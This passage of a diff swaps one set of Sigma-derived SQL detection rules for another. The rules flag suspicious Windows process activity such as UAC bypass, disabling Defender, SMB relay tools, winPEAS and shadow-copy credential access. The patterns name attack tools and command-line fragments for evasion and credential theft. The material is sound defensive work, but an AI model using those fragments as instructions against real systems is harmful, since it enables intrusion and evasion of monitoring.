Undocumented WindowsServer RCE", - "id": "6d5b8176-d87d-4402-8af4-53aee9db7b5d", - "status": "experimental", - "description": "Detects potential exploitation attempt of undocumented Windows Server Pre Auth Remote Code Execution (RCE)", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", + "title": "Potential MsiExec Masquerading", + "id": "e22a6eb2-f8a5-44b5-8b44-a2dbd47b1144", + "status": "test", + "description": "Detects the execution of msiexec.exe from an uncommon directory", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.t1036.005" + ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k DHCPServer%' ESCAPE '\\' AND CommandLine LIKE '%-k DHCPServer%' ESCAPE '\\' AND (User LIKE '%NETWORK SERVICE%' ESCAPE '\\' OR User LIKE '%NETZWERKDIENST%' ESCAPE '\\' OR User LIKE '%SERVIZIO DI RETE%' ESCAPE '\\' OR User LIKE '%SERVICIO DE RED%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\msiexec.exe' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_other_win_server_undocumented_rce.yml" + "filename": "proc_creation_win_msiexec_masquerading.yml" }, { - "title": "HackTool - Impersonate Execution", - "id": "cf0c254b-22f1-4b2b-8221-e137b3c0af94", - "status": "experimental", - "description": "Detects execution of the Impersonate tool. 
Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively", - "author": "Sai Prashanth Pulisetti @pulisettis", + "title": "Suspicious Regsvr32 Execution From Remote Share", + "id": "88a87a10-384b-4ad7-8871-2f9bf9259ce5", + "status": "experimental", + "description": "Detects REGSVR32.exe to execute DLL hosted on remote shares", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", "attack.defense_evasion", - "attack.t1134.001", - "attack.t1134.003" + "attack.t1218.010" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%impersonate.exe%' ESCAPE '\\' AND (CommandLine LIKE '% list %' ESCAPE '\\' OR CommandLine LIKE '% exec %' ESCAPE '\\' OR CommandLine LIKE '% adduser %' ESCAPE '\\')) OR ((Hashes LIKE '%MD5=9520714AB576B0ED01D1513691377D01%' ESCAPE '\\' OR Hashes LIKE '%SHA256=E81CC96E2118DC4FBFE5BAD1604E0AC7681960143E2101E1A024D52264BB0A8A%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0A358FFC1697B7A07D0E817AC740DF62%' ESCAPE '\\') OR md5 = '9520714AB576B0ED01D1513691377D01' OR sha256 = 'E81CC96E2118DC4FBFE5BAD1604E0AC7681960143E2101E1A024D52264BB0A8A' OR Imphash = '0A358FFC1697B7A07D0E817AC740DF62')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\REGSVR32.EXE' ESCAPE '\\') AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_impersonate.yml" + "filename": "proc_creation_win_regsvr32_remote_share.yml" }, { - "title": "New ActiveScriptEventConsumer Created Via Wmic.EXE", - "id": "ebef4391-1a81-4761-a40a-1db446c0e625", + "title": "Bypass UAC via WSReset.exe", + "id": "d797268e-28a9-49a7-b9a8-2f5039011c5c", "status": "test", - "description": "Detects WMIC 
executions in which an event consumer gets created. This could be used to establish persistence", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects use of WSReset.exe to bypass User Account Control (UAC). Adversaries use this technique to execute privileged processes.", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community, Florian Roth", "tags": [ - "attack.persistence", - "attack.t1546.003" + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1548.002" ], "falsepositives": [ - "Legitimate software creating script event consumers" + "Unknown sub processes of Wsreset.exe" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%ActiveScriptEventConsumer%' ESCAPE '\\' AND CommandLine LIKE '% CREATE %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\wsreset.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\conhost.exe' ESCAPE '\\' OR OriginalFileName = 'CONHOST.EXE'))" ], - "filename": "proc_creation_win_wmic_eventconsumer_creation.yml" + "filename": "proc_creation_win_uac_bypass_wsreset.yml" }, { - "title": "Potential Ke3chang/TidePool Malware Activity", - "id": "7b544661-69fc-419f-9a59-82ccc328f205", + "title": "DumpStack.log Defender Evasion", + "id": "4f647cfa-b598-4e12-ad69-c68dd16caef8", "status": "test", - "description": "Detects registry modifications potentially related to the Ke3chang/TidePool malware as seen in campaigns running in 2019 and 2020", - "author": "Markus Neis, Swisscom", + "description": "Detects the use of the filename DumpStack.log to evade Microsoft Defender", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.g0004", - "attack.defense_evasion", - "attack.t1562.001" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", 
"rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%-Property DWORD -name DisableFirstRunCustomize -value 2 -Force%' ESCAPE '\\' OR CommandLine LIKE '%-Property String -name Check\\_Associations -value%' ESCAPE '\\' OR CommandLine LIKE '%-Property DWORD -name IEHarden -value 0 -Force%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\DumpStack.log' ESCAPE '\\' OR CommandLine LIKE '% -o DumpStack.log%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_ke3chang_tidepool.yml" + "filename": "proc_creation_win_susp_dumpstack_log_evasion.yml" }, { - "title": "Suspicious CodePage Switch Via CHCP", - "id": "c7942406-33dd-4377-a564-0f62db0593a3", + "title": "New Port Forwarding Rule Added Via Netsh.EXX", + "id": "322ed9ec-fcab-4f67-9a34-e7c6aef43614", "status": "test", - "description": "Detects a code page switch in command line or batch scripts to a rare language", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", + "description": "Detects the execution of netsh commands that configure a new port forwarding (PortProxy) rule", + "author": "Florian Roth (Nextron Systems), omkar72, oscd.community, Swachchhanda Shrawan Poudel", "tags": [ - "attack.t1036", - "attack.defense_evasion" + "attack.lateral_movement", + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1090" ], "falsepositives": [ - "Administrative activity (adjust code pages according to your organization's region)" + "Legitimate administration activity", + "WSL2 network bridge PowerShell script used for WSL/Kubernetes/Docker (e.g. 
https://github.com/microsoft/WSL/issues/4150#issuecomment-504209723)" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\chcp.com' ESCAPE '\\' AND (CommandLine LIKE '% 936' ESCAPE '\\' OR CommandLine LIKE '% 1258' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND ((CommandLine LIKE '%interface%' ESCAPE '\\' AND CommandLine LIKE '%portproxy%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%v4tov4%' ESCAPE '\\') OR (CommandLine LIKE '%i %' ESCAPE '\\' AND CommandLine LIKE '%p %' ESCAPE '\\' AND CommandLine LIKE '%a %' ESCAPE '\\' AND CommandLine LIKE '%v %' ESCAPE '\\') OR (CommandLine LIKE '%connectp%' ESCAPE '\\' AND CommandLine LIKE '%listena%' ESCAPE '\\' AND CommandLine LIKE '%c=%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_chcp_codepage_switch.yml" + "filename": "proc_creation_win_netsh_port_forwarding.yml" }, { - "title": "Potential NTLM Coercion Via Certutil.EXE", - "id": "6c6d9280-e6d0-4b9d-80ac-254701b64916", - "status": "experimental", - "description": "Detects possible NTLM coercion via certutil using the 'syncwithWU' flag", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Audit Policy Tampering Via Auditpol", + "id": "0a13e132-651d-11eb-ae93-0242ac130002", + "status": "test", + "description": "Threat actors can use auditpol binary to change audit policy configuration to impair detection capability.\nThis can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\n", + "author": "Janantha Marasinghe (https://github.com/blueteam0ps)", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1562.002" ], "falsepositives": [ - "Unknown" + "Administrator or administrator 
scripts might leverage the flags mentioned in the detection section. Either way, it should always be monitored" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '% -syncwithWU %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\auditpol.exe' ESCAPE '\\' OR OriginalFileName = 'AUDITPOL.EXE') AND (CommandLine LIKE '%disable%' ESCAPE '\\' OR CommandLine LIKE '%clear%' ESCAPE '\\' OR CommandLine LIKE '%remove%' ESCAPE '\\' OR CommandLine LIKE '%restore%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_certutil_ntlm_coercion.yml" + "filename": "proc_creation_win_auditpol_susp_execution.yml" }, { - "title": "HackTool - DInjector PowerShell Cradle Execution", - "id": "d78b5d61-187d-44b6-bf02-93486a80de5a", + "title": "Potential Commandline Obfuscation Using Escape Characters", + "id": "f0cdd048-82dc-4f7a-8a7a-b87a52b6d0fd", "status": "test", - "description": "Detects the use of the Dinject PowerShell cradle based on the specific flags", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects potential commandline obfuscation using known escape characters", + "author": "juju4", "tags": [ "attack.defense_evasion", - "attack.t1055" + "attack.t1140" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% /am51%' ESCAPE '\\' AND CommandLine LIKE '% /password%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%h^t^t^p%' ESCAPE '\\' OR CommandLine LIKE '%h\"t\"t\"p%' ESCAPE '\\'))" ], - 
"filename": "proc_creation_win_hktl_dinjector.yml" + "filename": "proc_creation_win_susp_cli_obfuscation_escape_char.yml" }, { - "title": "Application Whitelisting Bypass via PresentationHost.exe", - "id": "d22e2925-cfd8-463f-96f6-89cec9d9bc5f", + "title": "PUA - Nimgrab Execution", + "id": "74a12f18-505c-4114-8d0b-8448dd5485c6", "status": "experimental", - "description": "Detects usage of \"PresentationHost\" which is a utility that runs \".xbap\" (Browser Applications) files. It can be abused to run malicious \".xbap\" files any bypass AWL", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the usage of nimgrab, a tool bundled with the Nim programming framework and used for downloading files.", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1218" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Legitimate \".xbap\" being executed via \"PresentationHost\"" + "Legitimate use of Nim on a developer systems" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\presentationhost.exe' ESCAPE '\\' OR OriginalFileName = 'PresentationHost.exe') AND CommandLine LIKE '%.xbap%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Program Files%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\nimgrab.exe' ESCAPE '\\' OR (Hashes LIKE '%MD5=2DD44C3C29D667F5C0EF5F9D7C7FFB8B%' ESCAPE '\\' OR Hashes LIKE '%SHA256=F266609E91985F0FE3E31C5E8FAEEEC4FFA5E0322D8B6F15FE69F4C5165B9559%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=C07FDDD21D123EA9B3A08EEF44AAAC45%' ESCAPE '\\') OR md5 = '2DD44C3C29D667F5C0EF5F9D7C7FFB8B' OR sha256 = 'F266609E91985F0FE3E31C5E8FAEEEC4FFA5E0322D8B6F15FE69F4C5165B9559' OR Imphash = 
'C07FDDD21D123EA9B3A08EEF44AAAC45'))" ], - "filename": "proc_creation_win_lolbin_presentationhost.yml" + "filename": "proc_creation_win_pua_nimgrab.yml" }, { - "title": "Import PowerShell Modules From Suspicious Directories - ProcCreation", - "id": "c31364f7-8be6-4b77-8483-dd2b5a7b69a3", - "status": "experimental", - "description": "Detects powershell scripts that import modules from suspicious directories", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious File Download Using Office Application", + "id": "0c79148b-118e-472b-bdb7-9b57b444cc19", + "status": "test", + "description": "Detects the usage of one of three Microsoft office applications (Word, Excel, PowerPoint) to download arbitrary files", + "author": "Beyu Denis, oscd.community", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%Import-Module \"$Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module ''$Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module $Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module \"$Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module ''$Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module $Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo \"$Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo ''$Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo $Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo \"$Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo ''$Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo $Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo C:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = 
'1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_import_module_susp_dirs.yml" + "filename": "proc_creation_win_lolbin_office.yml" }, { - "title": "OilRig APT Activity", - "id": "ce6e34ca-966d-41c9-8d93-5b06c8b97a06", + "title": "Potential Conti Ransomware Database Dumping Activity", + "id": "2f47f1fd-0901-466e-a770-3b7092834a1b", "status": "test", - "description": "Detects OilRig activity as reported by Nyotron in their March 2018 report", - "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "description": "Detects a command used by conti to dump database", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.g0049", - "attack.t1053.005", - "attack.s0111", - "attack.t1543.003", - "attack.defense_evasion", - "attack.t1112", - "attack.command_and_control", - "attack.t1071.004" + "attack.collection", + "attack.t1005" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%SC Scheduled Scan%' ESCAPE '\\' AND CommandLine LIKE '%\\\\microsoft\\\\Taskbar\\\\autoit3.exe%' ESCAPE '\\') OR (Image LIKE '%\\\\Windows\\\\Temp\\\\DB\\\\%' ESCAPE '\\' AND Image LIKE '%.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\system32\\\\Service.exe' ESCAPE '\\' AND (CommandLine LIKE '%i%' ESCAPE '\\' OR CommandLine LIKE '%u%' ESCAPE '\\')) OR (ParentImage LIKE '%\\\\local\\\\microsoft\\\\Taskbar\\\\autoit3.exe' ESCAPE '\\' AND CommandLine LIKE '%nslookup.exe%' ESCAPE '\\' AND CommandLine LIKE '%-q=TXT%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sqlcmd.exe' ESCAPE '\\' OR (CommandLine LIKE '%sqlcmd %' ESCAPE '\\' OR CommandLine LIKE '%sqlcmd.exe%' ESCAPE '\\')) AND CommandLine LIKE '% -S localhost %' ESCAPE '\\' AND (CommandLine LIKE '%sys.sysprocesses%' ESCAPE '\\' OR CommandLine LIKE '%master.dbo.sysdatabases%' ESCAPE '\\' OR CommandLine LIKE '%BACKUP DATABASE%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_oilrig_mar18.yml" + "filename": "proc_creation_win_malware_conti_ransomware_database_dump.yml" }, { - "title": "Potential SMB Relay Attack Tool Execution", - "id": "5589ab4f-a767-433c-961d-c91f3f704db1", - "status": "test", - "description": "Detects different hacktools used for relay attacks on Windows for privilege escalation", - "author": "Florian Roth (Nextron Systems)", + "title": "Disable Windows Defender AV Security Monitoring", + "id": "a7ee1722-c3c5-aeff-3212-c777e4733217", + "status": "experimental", + "description": "Detects attackers attempting to disable Windows Defender using Powershell", + "author": "ok @securonix invrep-de, oscd.community, frack113", "tags": [ - "attack.execution", - "attack.t1557.001" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate files with these rare hacktool names" + "Minimal, for some older versions of dev tools, such as pycharm, developers were known to sometimes disable Windows Defender to improve performance, but this generally is not considered a good security practice." 
], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%PetitPotam%' ESCAPE '\\' OR Image LIKE '%RottenPotato%' ESCAPE '\\' OR Image LIKE '%HotPotato%' ESCAPE '\\' OR Image LIKE '%JuicyPotato%' ESCAPE '\\' OR Image LIKE '%\\\\just\\_dce\\_%' ESCAPE '\\' OR Image LIKE '%Juicy Potato%' ESCAPE '\\' OR Image LIKE '%\\\\temp\\\\rot.exe%' ESCAPE '\\' OR Image LIKE '%\\\\Potato.exe%' ESCAPE '\\' OR Image LIKE '%\\\\SpoolSample.exe%' ESCAPE '\\' OR Image LIKE '%\\\\Responder.exe%' ESCAPE '\\' OR Image LIKE '%\\\\smbrelayx%' ESCAPE '\\' OR Image LIKE '%\\\\ntlmrelayx%' ESCAPE '\\' OR Image LIKE '%\\\\LocalPotato%' ESCAPE '\\') OR (CommandLine LIKE '%Invoke-Tater%' ESCAPE '\\' OR CommandLine LIKE '% smbrelay%' ESCAPE '\\' OR CommandLine LIKE '% ntlmrelay%' ESCAPE '\\' OR CommandLine LIKE '%cme smb %' ESCAPE '\\' OR CommandLine LIKE '% /ntlm:NTLMhash %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PetitPotam%' ESCAPE '\\' OR CommandLine LIKE '%.exe -t % -p %' ESCAPE '\\') OR (CommandLine LIKE '%.exe -c \"{%' ESCAPE '\\' AND CommandLine LIKE '%}\" -z' ESCAPE '\\')) AND NOT (((Image LIKE '%HotPotatoes6%' ESCAPE '\\' OR Image LIKE '%HotPotatoes7%' ESCAPE '\\' OR Image LIKE '%HotPotatoes %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%-DisableBehaviorMonitoring $true%' ESCAPE '\\' OR CommandLine LIKE '%-DisableRuntimeMonitoring $true%' ESCAPE '\\')) OR ((Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND ((CommandLine LIKE '%stop%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\') OR (CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\') OR (CommandLine LIKE 
'%config%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\' AND CommandLine LIKE '%start=disabled%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_hktl_relay_attacks_tools.yml" + "filename": "proc_creation_win_powershell_disable_defender_av_security_monitoring.yml" }, { "title": "Application Whitelisting Bypass via DLL Loaded by odbcconf.exe", 
@@ -17837,15161 +17401,15313 @@ "filename": "proc_creation_win_odbcconf_susp_exec.yml" }, { - "title": "UAC Bypass WSReset", - "id": "89a9a0e0-f61a-42e5-8957-b1479565a658", + "title": "Shadow Copies Creation Using Operating Systems Utilities", + "id": "b17ea6f7-6e90-447e-a799-e6c0a493d6ce", "status": "test", - "description": "Detects the pattern of UAC Bypass via WSReset usable by default sysmon-config", - "author": "Christian Burkard (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wsreset.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" - ], - "filename": "proc_creation_win_uac_bypass_wsreset_integrity_level.yml" - }, - { - "title": "HackTool - winPEAS Execution", - "id": "98b53e78-ebaf-46f8-be06-421aafd176d9", - "status": "experimental", - "description": "WinPEAS is a script that search for possible paths to escalate privileges on Windows hosts. 
The checks are explained on book.hacktricks.xyz", - "author": "Georg Lauenstein (sure[secure])", + "description": "Shadow Copies creation using operating systems utilities, possible credential access", + "author": "Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.privilege_escalation", - "attack.t1082", - "attack.t1087", - "attack.t1046" + "attack.credential_access", + "attack.t1003", + "attack.t1003.002", + "attack.t1003.003" ], "falsepositives": [ - "Unlikely" + "Legitimate administrator working with shadow copies, access for backup purposes" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'winPEAS.exe' OR (Image LIKE '%\\\\winPEASany.exe' ESCAPE '\\' OR Image LIKE '%\\\\winPEASany\\_ofs.exe' ESCAPE '\\' OR Image LIKE '%\\\\winPEASx64.exe' ESCAPE '\\' OR Image LIKE '%\\\\winPEASx64\\_ofs.exe' ESCAPE '\\' OR Image LIKE '%\\\\winPEASx86.exe' ESCAPE '\\' OR Image LIKE '%\\\\winPEASx86\\_ofs.exe' ESCAPE '\\') OR (CommandLine LIKE '% applicationsinfo%' ESCAPE '\\' OR CommandLine LIKE '% browserinfo%' ESCAPE '\\' OR CommandLine LIKE '% eventsinfo%' ESCAPE '\\' OR CommandLine LIKE '% fileanalysis%' ESCAPE '\\' OR CommandLine LIKE '% filesinfo%' ESCAPE '\\' OR CommandLine LIKE '% processinfo%' ESCAPE '\\' OR CommandLine LIKE '% servicesinfo%' ESCAPE '\\' OR CommandLine LIKE '% windowscreds%' ESCAPE '\\') OR CommandLine LIKE '%https://github.com/carlospolop/PEASS-ng/releases/latest/download/%' ESCAPE '\\' OR ParentCommandLine LIKE '% -linpeas' ESCAPE '\\' OR CommandLine LIKE '% -linpeas' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\') OR OriginalFileName IN 
('PowerShell.EXE', 'pwsh.dll', 'wmic.exe', 'VSSADMIN.EXE')) AND (CommandLine LIKE '%shadow%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_winpeas.yml" + "filename": "proc_creation_win_susp_shadow_copies_creation.yml" }, { - "title": "Suspicious Mofcomp Execution", - "id": "1dd05363-104e-4b4a-b963-196a534b03a1", - "status": "experimental", - "description": "Detects execution of the \"mofcomp\" utility as a child of a suspicious shell or script running utility or by having a supsicious path in the commandline.\nThe \"mofcomp\" utility parses a file containing MOF statements and adds the classes and class instances defined in the file to the WMI repository.\nAttackers abuse this utility to install malicious MOF scripts\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "LOLBIN Execution Of The FTP.EXE Binary", + "id": "06b401f4-107c-4ff9-947f-9ec1e7649f1e", + "status": "test", + "description": "Detects execution of ftp.exe script execution with the \"-s\" flag and any child processes ran by ftp.exe", + "author": "Victor Sergeev, oscd.community", "tags": [ "attack.execution", - "attack.t1218" + "attack.t1059", + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\mofcomp.exe' ESCAPE '\\' OR OriginalFileName = 'mofcomp.exe') AND ((ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wsl.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\') OR (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE 
'%\\%temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\ftp.exe' ESCAPE '\\' OR ((Image LIKE '%\\\\ftp.exe' ESCAPE '\\' OR OriginalFileName = 'ftp.exe') AND CommandLine LIKE '%-s:%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_mofcomp_execution.yml" + "filename": "proc_creation_win_lolbin_ftp.yml" }, { - "title": "Delete All Scheduled Tasks", - "id": "220457c1-1c9f-4c2e-afe6-9598926222c1", - "status": "experimental", - "description": "Detects the usage of schtasks with the delete flag and the asterisk symbole to delete all tasks from the schedule of the local computer, including tasks scheduled by other users.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Rundll32 JS RunHTMLApplication Pattern", + "id": "9f06447a-a33a-4cbe-a94f-a3f43184a7a3", + "status": "test", + "description": "Detects suspicious command line patterns used when rundll32 is used to run JavaScript code", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1489" + "attack.defense_evasion" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /delete %' ESCAPE '\\' AND CommandLine LIKE '%/tn \\*' ESCAPE '\\' AND CommandLine LIKE '% /f%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 